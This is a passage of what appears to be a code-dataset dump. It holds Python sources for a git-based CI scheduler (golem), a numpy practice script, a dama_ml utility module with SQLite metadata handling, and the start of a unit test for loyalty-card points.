self.reflogtype = 'http'\n self.reflogurl = self.upstream + '/logs/%REF%'\n elif self.upstream.startswith('file://'):\n self.reflogtype = 'file'\n self.upstream_path = self.upstream[7:]\n if self.git('config', 'core.bare', cwd=self.upstream_path).stdout.strip() != 'false':\n self.upstream_path = os.path.join(self.upstream_path, '.git')\n elif ':' in self.upstream:\n self.reflogtype = 'ssh'\n else:\n self.reflogtype = 'file'\n self.upstream_path = self.upstream\n if self.shell.git('config', 'core.bare', cwd=self.upstream).stdout.strip() != 'false':\n self.upstream_path = os.path.join(self.upstream_path, '.git')\n\n if re.match('^([a-z]+://|git@)github.com', self.upstream):\n self.reflogtype = 'github'\n\n if not self.reflogtype:\n raise GolemError(\"Don't know how to fetch reflogs for %s\" % self.name)\n\n for section in config.sections():\n if section.startswith('action:'):\n action = section[7:]\n self.logger.info(\" Adding action %s\" % action)\n self.actions[action] = Action(config, section)\n self.actions[action].artefact_path = os.path.join(self.artefact_path, action)\n self.actions[action].daemon = daemon\n self.actions[action].repo_name = self.name\n elif section.startswith('notify:'):\n nf = section[7:]\n self.logger.info(\" Adding notifier %s\" % nf)\n self.notifiers[nf] = Notifier(config, section)\n self.notifiers[nf].daemon = daemon\n self.notifiers[nf].repo_name = self.name\n\n changed 
= True\n while changed:\n changed = False\n for action in self.actions:\n for req in self.actions[action].requires:\n req = req[7:]\n\n # Backlog is \"inherited\" from the dependencies\n if self.actions[req].backlog < self.actions[action].backlog:\n changed = True\n self.actions[action].backlog = self.actions[req].backlog\n\n # Same for branches and tags. Intersection of all parents\n if self.actions[req].branches and not self.actions[action].branches:\n changed = True\n self.actions[action].branches = copy(self.actions[req].branches)\n elif self.actions[req].branches:\n for branch in self.actions[action].branches[:]:\n if branch not in self.actions[req].branches:\n changed = True\n self.actions[action].branches.remove(branch)\n if self.actions[req].tags and not self.actions[action].tags:\n changed = True\n self.actions[action].tags = copy(self.actions[req].tags)\n elif self.actions[req].tags:\n for tag in self.actions[action].tags[:]:\n if tag not in self.actions[req].tags:\n changed = True\n self.actions[action].tags.remove(tag)\n\n if not daemon.dummy:\n self.create_dirs()\n\n _r = golem.db.repository\n self.id = db.execute(sql.select([_r.c.id]).where(_r.c.name==self.name)).fetchone()\n self.id = self.id.id if self.id else db.execute(_r.insert().values(name=self.name)).inserted_primary_key[0]\n\n def last_commits(self, count, db):\n _c = golem.db.commit\n return db.execute(_c.select().where(_c.c.repository==self.id).order_by(sql.desc(_c.c.submit_time)).limit(count)).fetchall()\n\n def commit(self, ref, sha1, db):\n _c = golem.db.commit\n return db.execute(_c.select().where(sql.and_(_c.c.repository==self.id, _c.c.ref==ref, _c.c.sha1==sha1))).fetchone()\n\n def shortlog(self, old, new):\n from golem.web.encoding import decode\n return decode(self.shell.git('shortlog', \"--format=* [%h] %s\", '%s..%s' % (old, new), cwd=self.repo_path).stdout)\n\n def shortlog_html(self, old, new):\n log = self.shortlog(old, new).replace('&', '&').replace('<', '<').replace('>', '>')\n log = re.sub('\\[([0-9a-f]+)\\]', lambda match: '[%s]' % (self.commit_url.replace('%SHA1%', match.group(1)), match.group(1)), log)\n return log\n\n def dependencies(self):\n ret = []\n for src in self.actions.values():\n for dst in src.requires:\n ret.append([src.name, dst[7:]])\n return ret\n\n def actions_for(self, ref, sha1, db):\n _c = golem.db.commit\n _a = golem.db.action\n _f = golem.db.artefact\n cid = db.execute(_c.select('id').where(sql.and_(_c.c.ref==ref, _c.c.sha1==sha1))).fetchone()['id']\n data = db.execute(_a.select().where(_a.c.commit==cid).order_by(sql.asc(_a.c.start_time))).fetchall()\n data = [{'name': x.name, 'status': x.status, 'start_time': x.start_time, 'end_time': x.end_time, 'host': x.host,\n 'duration': x.duration, 'config': self.actions[x.name].config,\n 'files':[{'filename': y.filename, 'sha1': y.sha1} for y in db.execute(_f.select().where(_f.c.action==x.id)).fetchall()]} \n for x in data if x.name in self.actions]\n return data\n\n def create_dirs(self):\n if not os.path.exists(self.artefact_path):\n os.makedirs(self.artefact_path)\n\n def update(self):\n self.logger.info(\"Processing update for %s\" % self.name)\n if self.upstream:\n if not os.path.exists(self.repo_path):\n self.logger.info(\"Cloning %s\" % self.upstream)\n res = self.shell.git('clone', '--mirror', self.upstream, os.path.basename(self.repo_path), cwd=self.path)\n if res.returncode != 0:\n raise GolemError(\"Unable to clone repository: %s\" % res.stdout)\n self.git('config', 'core.logallrefupdates', 'false')\n self.git('config', 
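Repository.update above reduces to a small amount of git plumbing: mirror-clone on first contact, then prune and fetch on every poll. A standalone sketch of that core using subprocess (golem itself drives git through whelk, as the class shows; the function name is mine):

import os
import subprocess

def mirror_sync(upstream, repo_path):
    if not os.path.exists(repo_path):
        # bare mirror clone, as Repository.update does on first sight
        subprocess.check_call(["git", "clone", "--mirror", upstream, repo_path])
    subprocess.check_call(["git", "-C", repo_path, "remote", "prune", "origin"])
    subprocess.check_call(["git", "-C", repo_path, "fetch", "origin"])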
'remote.origin.fetch', 'refs/heads/*:refs/heads/*')\n else:\n if self.git('config', 'remote.origin.url').stdout.strip() != self.upstream:\n self.logger.warning(\"Updating origin url\")\n self.git('config', 'remote.origin.url', self.upstream)\n if self.git('config', 'remote.origin.fetch').stdout.strip() != '+refs/heads/*:refs/heads/*':\n self.git('config', 'remote.origin.fetch', '+refs/heads/*:refs/heads/*')\n self.logger.info(\"Fetching from %s\" % self.upstream)\n self.git('remote', 'prune', 'origin')\n self.git('fetch', 'origin')\n if self.remote:\n _remotes = self.git('remote').stdout.strip().split()\n for remote in self.remote:\n if remote not in _remotes:\n self.git('remote', 'add', remote, self.remote[remote])\n\n if self.git('config', 'remote.%s.url' % remote).stdout.strip() != self.remote[remote]:\n self.logger.warning(\"Updating %s url\" % remote)\n self.git('config', 'remote.%s.url' % remote, self.remote[remote])\n self.logger.info(\"Fetching from %s\" % self.remote[remote])\n try:\n self.git('remote', 'prune', remote)\n self.git('fetch', remote)\n except RuntimeError:\n # For secondary repos, exceptions are ok\n for line in traceback.format_exc().split('\\n'):\n self.logger.error(line)\n if self.git('ls-tree', 'HEAD', '.gitmodules').stdout.strip():\n # This needs a workdir, so have a temporary one\n wd = self.repo_path + '.work'\n if not os.path.exists(wd):\n os.mkdir(wd)\n env = {'GIT_DIR': self.repo_path, 'GIT_WORK_TREE': wd}\n self.git('checkout', 'HEAD', cwd=wd, env=env)\n self.git('reset', '--hard', 'HEAD', cwd=wd, env=env)\n self.git('submodule', 'init', cwd=wd, env=env)\n self.git('submodule', 'update', cwd=wd, env=env)\n shutil.rmtree(wd)\n self.update_reflog()\n\n def update_reflog(self):\n if self.reflogtype == 'file':\n self.shell.rsync(os.path.join(self.upstream_path, 'logs/'),\n os.path.join(self.repo_path, 'logs/'))\n elif self.reflogtype == 'ssh':\n self.shell.rsync('%s/logs/' % self.upstream, os.path.join(self.repo_path, 'logs/'))\n elif self.reflogtype == 'http':\n branches = self.git('for-each-ref', '--format', '%(refname:short)', 'refs/heads').stdout.splitlines()\n for branch in branches:\n logpath = os.path.join(self.repo_path, 'logs', 'refs', 'heads', branch)\n if not os.path.exists(os.path.dirname(logpath)):\n os.makedirs(os.path.dirname(logpath))\n res = requests.get(self.reflogurl.replace('%REF%', 'refs/heads/%s' % branch))\n if res.status_code != 200:\n raise GolemError(\"Unable to fetch reflog for branch: %s\" % r.status_code)\n with open(logpath, 'w') as fd:\n fd.write(res.text.encode('utf-8'))\n elif self.reflogtype == 'github':\n gh = github()\n BOGUS_SHA1 = '1' * 40\n user, repo = self.upstream.rsplit('/', 3)[-2:]\n # For ssh urls\n if ':' in user:\n user = user[user.find(':')+1:]\n if repo.endswith('.git'):\n repo = repo[:-4]\n repo = gh.repository(user, repo)\n branches = collections.defaultdict(list)\n heads = {}\n\n for event in repo.iter_events(number=300):\n if event.type == 'CreateEvent' and event.payload['ref_type'] == 'branch':\n # log --reverse -n1 does not what I expect: it outputs only the *last*\n # commit. 
I want the first.\n ret = self.shell.git('log', '--pretty=%H', '%s..%s' % (event.payload['master_branch'], event.payload['ref']), '--')\n if ret.returncode != 0:\n # Branch no longer exists, so we don't care\n continue\n if not ret.stdout.strip():\n ret = self.shell.git('rev-parse', event.payload['ref'])\n sha = ret.stdout.rsplit('\\n', 2)[-1]\n push = (\n '0' * 40,\n sha,\n cache(gh.user, event.actor.login).name,\n '<%s@github>' % event.actor.login,\n event.created_at.strftime('%s +0000'),\n 'push',\n )\n branches['refs/heads/' + event.payload['ref']].append(push)\n if event.type != 'PushEvent':\n continue\n # Format:\n # prev_sha1 sha1 Author Name timestamp +TZOFF push\n push = (\n event.payload.get('before',BOGUS_SHA1), # Older events don't have 'before'\n event.payload['head'],\n cache(gh.user, event.actor.login).name,\n '<%s@github>' % event.actor.login,\n event.created_at.strftime('%s +0000'),\n 'push',\n )\n heads[event.payload['head']] = 1\n branches[event.payload['ref']].append(push)\n\n for branch in branches:\n branches[branch].reverse()\n log_path = os.path.join(self.repo_path, 'logs', branch)\n if os.path.exists(log_path):\n with open(log_path) as fd:\n log = fd.readlines()\n for line in log:\n old, new, junk = line.strip().split(None, 2)\n if new not in heads:\n name, mail, ts, tz, psh = junk.rsplit(None, 4)\n branches[branch].append((old, new, name, mail, '%s %s' % (ts, tz), psh))\n branches[branch].sort(key=lambda x: x[4])\n log = \"\\n\".join([' '.join(push) for push in branches[branch]]) + \"\\n\"\n\n if not os.path.exists(os.path.dirname(log_path)):\n os.makedirs(os.path.dirname(log_path))\n with open(log_path, 'w') as fd:\n fd.write(log)\n else:\n raise GolemError(\"Don't know how to fetch the reflog\")\n\n def schedule(self, job, db):\n ref = job.get('ref', None)\n why = job['why']\n repo = job['repo']\n\n _c = golem.db.commit\n _a = golem.db.action\n _r = golem.db.repository\n _f = golem.db.artefact\n\n refs = {}\n tags = []\n if why == 'reschedule':\n if job['sha1']:\n c = db.execute(_c.select().where(sql.and_(_c.c.ref==job['ref'], _c.c.sha1==job['sha1']))).fetchone()\n if not c:\n self.logger.error(\"Commit %s for ref %s cannot be rescheduled, it does not exist\" % (job['sha1'], job['ref']))\n return\n else:\n c = db.execute(_c.select().where(_c.c.ref==job['ref']).order_by(sql.desc(_c.c.submit_time)).limit(1)).fetchone()\n if not c:\n self.logger.error(\"Cannot reschedule actions for ref %s, no commits were processed yet\" % job['ref'])\n return\n job['prev_sha1'], job['sha1'] = c.prev_sha1, c.sha1\n\n if ref and ref.startswith(('refs/heads', 'refs/tags')):\n refs[ref] = [(job['prev_sha1'], job['sha1'])]\n if ref and ref.startswith('refs/tags'):\n tags = [(ref, 0)]\n\n if why == 'action-started':\n res = db.execute(_a.join(_c).join(_r).select(use_labels=True).where(\n sql.and_(_r.c.name == job['repo'], _c.c.ref==job['ref'], _c.c.sha1==job['sha1'], _a.c.name==job['action']))).fetchone()\n aid, cid = res.action_id, res.commit_id\n db.execute(_a.update().values(status='started', start_time=datetime.datetime.utcfromtimestamp(job['start_time']),\n host=job['host']).where(_a.c.id==aid))\n\n if why == 'action-done':\n res = db.execute(_a.join(_c).join(_r).select(use_labels=True).where(\n sql.and_(_r.c.name == job['repo'], _c.c.ref==job['ref'], _c.c.sha1==job['sha1'], _a.c.name==job['action']))).fetchone()\n aid, cid = res.action_id, res.commit_id\n db.execute(_a.update().values(status=job['result'], start_time=datetime.datetime.utcfromtimestamp(job['start_time']), \n 
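The tuples assembled from GitHub push events serialize to the same whitespace-separated layout that git itself writes to logs/refs/heads/*, which is why the merge step below can round-trip them with split and rsplit. A minimal demonstration of that line format (synthetic values):

old, new = "0" * 40, "ab12" * 10
line = " ".join((old, new, "Jane Doe", "<jane@github>", "1350000000 +0000", "push"))
# parsing, exactly as the merge loop does
o, n, junk = line.strip().split(None, 2)
name, mail, ts, tz, psh = junk.rsplit(None, 4)
assert (o, n, psh) == (old, new, "push")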
end_time=datetime.datetime.utcfromtimestamp(job['end_time']), duration=job['duration'],\n host=job['host']).where(_a.c.id==aid))\n if job['result'] == 'fail':\n db.execute(_c.update().values(status=job['result']).where(_c.c.id==cid))\n elif db.execute(sql.select([sql.func.count(_a.c.id)]).where(sql.and_(_a.c.status!='success', _a.c.commit==cid))).scalar() == 0:\n db.execute(_c.update().values(status='success').where(_c.c.id==cid))\n artefact_path = os.path.join(self.actions[job['action']].artefact_path, '%s@%s' % (job['ref'], job['sha1']))\n for path, _, files in os.walk(artefact_path):\n for file in files:\n if file != 'log':\n file = os.path.join(path, file)\n rfile = file[len(artefact_path)+len(os.sep):]\n fsha1 = sha1_file(file)\n try:\n db.execute(_f.insert().values(action=aid, filename=rfile, sha1=fsha1))\n except:\n # XXX should reschedule not simply delete things?\n db.execute(_f.update().where(sql.and_(_f.c.action==aid, _f.c.filename==rfile)).values(sha1=fsha1))\n for nf in self.notifiers.values():\n for what in nf.process:\n if fnmatch.fnmatch('action:' + job['action'], what):\n nf.schedule(job)\n\n if why == 'post-receive' and not refs:\n for head in self.git('for-each-ref', '--format', '%(refname)', 'refs/heads').stdout.splitlines():\n lf = os.path.join(self.repo_path, 'logs', 'refs', 'heads', head[11:])\n if not os.path.exists(lf):\n refs[head] = []\n else:\n with open(lf) as fd:\n log = fd.readlines()\n refs[head] = [x.split(None, 2)[:2] for x in log]\n null = '0' * 40\n for tag in self.git('for-each-ref', '--format', '%(refname) %(*objectname) %(objectname) %(taggerdate:raw) %(committerdate:raw)', 'refs/tags').stdout.splitlines():\n data = tag.split()\n if not (data[-2].isdigit() and data[-1][1:].isdigit()):\n # Severely broken tag \n continue\n tag, sha = data[:2]\n ts = data[-2:]\n ts = int(ts[0]) + (-1 if ts[1][0] == '-' else 1) * (3600 * int(ts[1][1:3]) + 60 * int(ts[1][3:]))\n refs[tag] = [(null, sha)]\n tags.append((tag, ts))\n\n if why == 'reschedule':\n # Set actions back to 'new'\n # Set dependent actions back to 'new'\n # Delete files from artefacts\n if job['action']:\n actions = [job['action']]\n else:\n actions = [x.name for x in db.execute(_a.select().where(sql.and_(_a.c.commit==c.id, _a.c.status=='retry'))).fetchall()]\n added = True\n while added:\n added = False\n for aname, action in self.actions.items():\n if aname in actions:\n continue\n for act in actions:\n if 'action:' + act in action.requires:\n added = True\n actions.append(aname)\n break\n for action in actions:\n self.actions[action].clean(job['ref'], job['sha1'])\n db.execute(_a.update().values(status='new',host=None, start_time=None, end_time=None,\n duration=None).where(sql.and_(_a.c.commit==c.id, _a.c.name.in_(actions))))\n\n tags.sort(key=lambda x: x[1], reverse=True)\n\n for aname, action in self.actions.items():\n if job['why'] == 'action-done' and 'action:' + job['action'] not in action.requires:\n continue\n my_tags = []\n for tag in tags:\n tag = tag[0][10:]\n for tag_ in action.tags:\n if tag_ == tag or (hasattr(tag_, 'match') and tag_.match(tag)):\n my_tags.append(tag)\n my_tags = my_tags[:action.backlog+1]\n for ref in refs:\n # Do we want to handle this thing?\n handle = False\n if ref.startswith('refs/heads'):\n head = ref[11:]\n for head_ in action.branches:\n if head_ == head or (hasattr(head_, 'match') and head_.match(head)):\n handle = True\n break\n elif ref.startswith('refs/tags'):\n tag = ref[10:]\n if tag in my_tags:\n handle = True\n\n if not handle:\n continue\n\n for 
prev_sha1, sha1 in refs[ref][-(action.backlog+1):]:\n cid = db.execute(_c.select().where(_c.c.repository==self.id).where(_c.c.ref==ref).where(_c.c.sha1==sha1)).fetchone()\n cid = cid.id if cid else db.execute(_c.insert().values(repository=self.id, ref=ref, sha1=sha1, prev_sha1=prev_sha1,\n submit_time=now(), status='new')).inserted_primary_key[0]\n act = db.execute(_a.select().where(_a.c.commit==cid).where(_a.c.name==action.name)).fetchone()\n if not act:\n db.execute(_a.insert().values(commit=cid, name=action.name, status='new'))\n act = db.execute(_a.select().where(_a.c.commit==cid).where(_a.c.name==action.name)).fetchone()\n\n # Check if all dependencies have been met\n if action.requires:\n requires = [x.replace('action:','') for x in action.requires]\n actions = db.execute(_a.select().where(_a.c.commit==cid).where(_a.c.name.in_(requires)).where(_a.c.status=='success')).fetchall()\n if len(actions) != len(action.requires):\n continue\n\n if act.status == 'new':\n db.execute(_a.update().where(_a.c.id==act.id).values(status='scheduled'))\n db.execute(_c.update().where(sql.and_(_c.c.id==cid, _c.c.status!='fail')).values(status='in-progress'))\n action.schedule(ref, prev_sha1, sha1)\n\n def git(self, *args, **kwargs):\n res = self.shell.git(*args, **kwargs)\n if res.returncode:\n raise RuntimeError(\"git %s failed: %s\" % (' '.join(args), res.stderr))\n return res\n\n def __repr__(self):\n return '' % (self.name, self.path)\n\nclass Action(IniConfig):\n defaults = {'branches': [], 'tags': [], 'requires': [], 'queue': None, 'backlog': 10, 'ttr': 120, 'publish': []}\n def __init__(self, config, section):\n if config.has_option(section, 'inherit'):\n IniConfig.__init__(self, config, config.get(section, 'inherit'))\n IniConfig.__init__(self, config, section)\n self.name = section[7:]\n self.logger = logging.getLogger('golem.action.' 
+ self.name)\n if isinstance(self.branches, basestring):\n self.branches = self.config['branches'] = [self.branches]\n for idx, branch in enumerate(self.branches):\n if branch.startswith('^'):\n self.branches[idx] = re.compile(branch)\n if isinstance(self.tags, basestring):\n self.tags = self.config['tags'] = [self.tags]\n for idx, tag in enumerate(self.tags):\n if tag.startswith('^'):\n self.tags[idx] = re.compile(tag)\n if isinstance(self.requires, basestring):\n self.requires = self.config['requires'] = [self.requires]\n if isinstance(self.publish, basestring):\n self.publish = self.config['publish'] = [self.publish]\n if isinstance(self.backlog, basestring):\n self.backlog = self.config['backlog'] = int(self.backlog)\n if isinstance(self.ttr, basestring):\n self.ttr = self.config['ttr'] = int(self.ttr)\n if hasattr(self, 'hook'):\n for key, val in self.hook.items():\n if isinstance(val, basestring):\n self.hook[key] = [[val]]\n elif isinstance(val[0], basestring):\n self.hook[key] = [val]\n self.config['hook'] = self.hook\n\n if not self.queue:\n raise ValueError(\"No queue specified\")\n\n def schedule(self, ref, prev_sha1, sha1):\n self.logger.info(\"Scheduling %s for %s@%s\" % (self.name, ref, sha1))\n self.daemon.bs.use(self.queue)\n data = {'repo': self.repo_name, 'ref': ref, 'prev_sha1': prev_sha1, 'sha1': sha1, 'action': self.name}\n data.update(self.config)\n if 'tags' in data:\n data['tags'] = [x.pattern if hasattr(x, 'pattern') else x for x in data['tags']]\n if 'branches' in data:\n data['branches'] = [x.pattern if hasattr(x, 'pattern') else x for x in data['branches']]\n\n self.daemon.bs.put(json.dumps(data), ttr=self.ttr)\n if sha1:\n ref += '@' + sha1\n if not os.path.exists(os.path.join(self.artefact_path, ref)):\n os.makedirs(os.path.join(self.artefact_path, ref))\n\n def clean(self, ref, sha1):\n ref += '@' + sha1\n if os.path.exists(os.path.join(self.artefact_path, ref)):\n shutil.rmtree(os.path.join(self.artefact_path, ref))\n\nclass Notifier(IniConfig):\n defaults = {'process': [], 'queue': None, 'ttr': 120}\n def __init__(self, config, section):\n if config.has_option(section, 'inherit'):\n IniConfig.__init__(self, config, config.get(section, 'inherit'))\n IniConfig.__init__(self, config, section)\n self.name = section[7:]\n self.logger = logging.getLogger('golem.notifier.' 
+ self.name)\n if isinstance(self.process, basestring):\n self.process = self.config['process'] = [self.process]\n if not self.queue:\n raise ValueError(\"No queue specified\")\n\n def schedule(self, job):\n self.logger.info(\"Scheduling %s notifications for %s@%s\" % (job['action'], job['ref'], job['sha1']))\n self.daemon.bs.use(self.queue)\n data = job.copy()\n data.update(self.config)\n self.daemon.bs.put(json.dumps(data), ttr=self.ttr)\n\n# Copied from git-hub\ndef github(try_login=False):\n config_file = os.path.join(os.path.expanduser('~'), '.githubconfig-golem')\n old_umask = os.umask(63) # 0o077\n shell = whelk.Shell()\n\n user = shell.git('config', '--file', config_file, 'github.user').stdout.strip()\n if not user and try_login:\n user = raw_input(\"Github user: \").strip()\n shell.git('config', '--file', config_file, 'github.user', user)\n\n token = shell.git('config', '--file', config_file, 'github.token').stdout.strip()\n if not token and try_login:\n password = getpass.getpass(\"Github password: \")\n auth = github3.authorize(user, password, ['user', 'repo', 'gist'],\n \"Golem on %s\" % socket.gethostname(), \"http://seveas.github.com/golem\")\n token = auth.token\n shell.git('config', '--file', config_file, 'github.token', token)\n shell.git('config', '--file', config_file, 'github.auth_id', str(auth.id))\n\n if not user or not token:\n raise GolemError(\"No github credentials found, try golem --login github\")\n\n gh = github3.login(username=user, token=token)\n try:\n gh.user()\n except github3.GitHubError:\n # Token obsolete\n shell.git('config', '--file', config_file, '--unset', 'github.token')\n gh = github(try_login)\n os.umask(old_umask)\n return gh\n\n_cache={}\ndef cache(fnc, *args):\n if (fnc,) + args not in _cache:\n _cache[(fnc,) + args] = fnc(*args)\n return _cache[(fnc,) + args]\n\ndef sha1_file(file):\n sha = hashlib.new('sha1')\n with open(file) as fd:\n while True:\n data = fd.read(4096)\n if not data:\n break\n sha.update(data)\n return sha.hexdigest()\n","repo_name":"seveas/golem","sub_path":"golem/repository.py","file_name":"repository.py","file_ext":"py","file_size_in_byte":30082,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"25212007695","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Sep 18 15:13:28 2017\n\n@author: Kaustav\n\"\"\"\n\nfam = [1.73,1.68,1.71,1.89]\nfam\nmax(fam)\ntallest = max(fam)\ntallest\nround(1.68,1)\nhelp(round)\nsister=\"liz\"\nsister.replace('z','sa')\nfam.append(\"me\")\nfam\nimport numpy as np\nnp.array([1,2,3])\nheight=[1,2,3,4,5]\nweight=[20,30,40,50,60]\nweight/height**2\n\nnp_height=np.array(height)\nnp_weight=np.array(weight)\nnp_weight/np_height**2\n\npython_list=[1,2,3]\nnumpy_array=np.array([1,2,3])\npython_list+python_list\nnumpy_array+numpy_array\n\nbmi=np.array([1,2,3,4,5])\nbmi\nbmi[1]\nbmi>4\nbmi[bmi>4]\ntype(np_height)","repo_name":"KSTVCHATTERJEE/Py_in_Action","sub_path":"Functions.py","file_name":"Functions.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"71123872835","text":"import hashlib\nimport numpy as np\nimport sqlite3\n\nfrom collections import OrderedDict\nfrom dama.utils.decorators import cache\nfrom dama.utils.logger import log_config\nfrom dama.utils.numeric_functions import calc_chunks\nfrom dask.base import normalize_token\n\n\nlog = log_config(__name__)\n__all__ = ['Hash', 'Shape', 'Chunks', 'Login', 'Metadata']\n\n\nclass 
Hash:\n def __init__(self, hash_fn: str = 'sha1'):\n self.hash_fn = hash_fn\n self.hash = getattr(hashlib, hash_fn)()\n\n def update(self, it):\n # if it.dtype == np.dtype(' list:\n values = []\n for shape in shapes:\n try:\n values.append(shape[dim])\n except IndexError:\n pass\n return values\n\n @cache\n def to_tuple(self) -> tuple:\n # if we have different lengths return dict of shapes\n shapes = list(self.values())\n if len(shapes) == 0:\n return tuple([0])\n elif len(shapes) == 1:\n return shapes[0]\n else:\n nshape = [self.max_length]\n max_shape = max(self.values())\n sum_groups = 0\n for shape in self.values():\n dim = shape[1:2]\n if len(dim) == 0:\n sum_groups += 1\n else:\n if len(shape) == len(max_shape):\n sum_groups += dim[0]\n else:\n sum_groups += 1\n nshape.append(sum_groups)\n remaining = list(max_shape[2:])\n if nshape[0] == 0 and len(max_shape) == 0:\n nshape[0] = 1\n return tuple(nshape + remaining)\n\n def to_chunks(self, chunks) -> 'Chunks':\n if isinstance(chunks, int):\n shape = self.change_length(chunks)\n return Chunks(shape)\n else:\n return Chunks.build_from(chunks, tuple(self.groups()))\n\n @property\n def max_length(self) -> int:\n if super(Shape, self).__len__() > 0:\n values = [a[0] for a in self.values() if len(a) > 0]\n if len(values) > 0:\n return max(values)\n return 0\n\n def change_length(self, length) -> 'Shape':\n shapes = OrderedDict()\n for group, shape in self.items():\n shapes[group] = tuple([length if length < shape[0] else shape[0]] + list(shape[1:]))\n return Shape(shapes)\n\n @staticmethod\n def get_shape_dtypes_from_dict(data_dict) -> tuple:\n shape = dict()\n dtypes = OrderedDict()\n for group, data in data_dict.items():\n shape[group] = data.shape\n dtypes[group] = data.dtype\n return Shape(shape), np.dtype(list(dtypes.items()))\n\n\nclass Chunks(dict):\n static_value = 0\n\n def from_groups(self, chunks: tuple, groups: tuple) -> 'Chunks':\n for group in groups:\n self[group] = chunks\n return self\n\n @staticmethod\n def build_from(chunks, groups: tuple) -> 'Chunks':\n if not isinstance(chunks, Chunks):\n _chunks = Chunks()\n if not hasattr(chunks, '__iter__'):\n chunks = tuple([chunks])\n return _chunks.from_groups(chunks, groups)\n else:\n return chunks\n\n @staticmethod\n def build_from_shape(shape: Shape, dtypes: np.dtype, memory_allowed=.9) -> 'Chunks':\n chunks_dict = calc_chunks(shape, dtypes, memory_allowed=memory_allowed)\n return Chunks(chunks_dict)\n\n @property\n def length(self) -> int:\n return max(r0[0] for r0 in self.values())\n\n\nclass Login(object):\n __slots__ = ['username', 'passwd', 'resource', 'url', 'table', 'host', 'port']\n\n def __init__(self, username: str = None, resource: str = None, passwd: str = None, url=None,\n table: str = None, host: str = None, port: int = None):\n self.username = username\n self.passwd = passwd\n self.resource = resource\n self.url = url\n self.table = table\n self.host = host\n self.port = port\n\n\nclass Metadata(dict):\n\n def __init__(self, driver, *args, **kwargs):\n super(Metadata, self).__init__(*args, **kwargs)\n self.driver = driver\n self.name = self.driver.login.table\n self.driver.build_url(\"metadata\", with_class_name=False)\n\n def __enter__(self):\n self.driver.open()\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.driver.close()\n\n def set_schema(self, dtypes: np.dtype, unique_key: list = None):\n self.driver.set_schema(dtypes, unique_key=unique_key)\n\n def insert_data(self):\n try:\n data = [self[group] for group in self.driver.groups]\n 
self.driver.insert(data)\n except sqlite3.IntegrityError as e:\n log.error(str(e) + \" in \" + self.driver.url)\n\n def insert_update_data(self, keys: list = None):\n try:\n data = [[self[group] for group in self.driver.groups]]\n self.driver[-1] = data\n except sqlite3.IntegrityError as e:\n log.warning(e)\n for key in keys:\n if self.insert_update_keys(key):\n break\n else:\n raise Exception(\"This dataset already exists with another hash\")\n\n def insert_update_keys(self, keys: list):\n if not isinstance(keys, list):\n base_keys = [keys]\n else:\n base_keys = list(keys)\n\n columns = [\"{col}=?\".format(col=group) for group in base_keys]\n query = \"SELECT id FROM {name} WHERE {columns_val}\".format(name=self.name,\n columns_val=\" AND \".join(columns))\n values = tuple([self[key] for key in base_keys])\n query_result = self.query(query, values)\n result = len(query_result) > 0\n if result:\n index = query_result[0][0] - 1\n data = [self[group] for group in self.driver.groups]\n self.driver[index] = data\n return result\n\n def query(self, query: str, values: tuple) -> tuple:\n try:\n cur = self.driver.conn.cursor()\n data = cur.execute(query, values).fetchall()\n cur.close()\n except sqlite3.OperationalError as e:\n log.error(str(e) + \" in \" + self.driver.url)\n else:\n self.driver.conn.commit()\n return data\n\n def data(self):\n chunks = Chunks.build_from(10, self.driver.groups)\n return self.driver.manager(chunks)\n\n def remove_data(self, hash_hex: str):\n self.query(\"DELETE FROM {} WHERE hash = ?\".format(self.name), (hash_hex, ))\n\n def invalid(self, hash_hex: str):\n self.query(\"UPDATE {} SET is_valid=? WHERE hash = ?\".format(self.name), (False, hash_hex,))\n\n def exists(self, hash_hex: str) -> bool:\n result = self.query(\"SELECT id FROM {} WHERE hash = ?\".format(self.name), (hash_hex, ))\n return len(result) > 0\n\n def is_valid(self, hash_hex: str) -> bool:\n result = self.query(\"SELECT is_valid FROM {} WHERE hash = ?\".format(self.name), (hash_hex,))\n return result[0][0]\n","repo_name":"elaeon/dama_ml","sub_path":"src/dama/utils/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":8260,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"33766315357","text":"from datetime import datetime\nfrom Domain.card_client import CardClient\nfrom Repository.repository_json import RepositoryJson\nfrom Service.card_client_service import CardClientService\nfrom Service.undo_redo_service import UndoRedoService\nfrom Tests.utils_tests import clear_file\n\n\ndef test_incrementare_puncte_interval_zile():\n filename = \"Tests/test_incrementare_puncte_interval_zile.json\"\n clear_file(filename)\n carduri_clienti = RepositoryJson(filename)\n card_client_1 = CardClient(\"1\", \"Popescu\", \"Ionela\", \"6110211055573\",\n datetime(2011, 2, 11), datetime(2020, 9, 2), 34)\n carduri_clienti.add(card_client_1)\n card_client_2 = CardClient(\"2\", \"Ionescu\", \"George\", \"5010510079105\",\n datetime(2001, 5, 10), datetime(2021, 1, 7), 17)\n carduri_clienti.add(card_client_2)\n undo_redo_test = UndoRedoService()\n incr_pct_interval_zile = CardClientService(carduri_clienti, undo_redo_test)\n incr_pct_interval_zile.incrementare_puncte_interval_zile(5, 10, 7)\n assert carduri_clienti.read(\"1\") == card_client_1\n card_client_2 = CardClient(\"2\", \"Ionescu\", \"George\", \"5010510079105\",\n datetime(2001, 5, 10), datetime(2021, 1, 7), 24)\n assert carduri_clienti.read(\"2\") == 
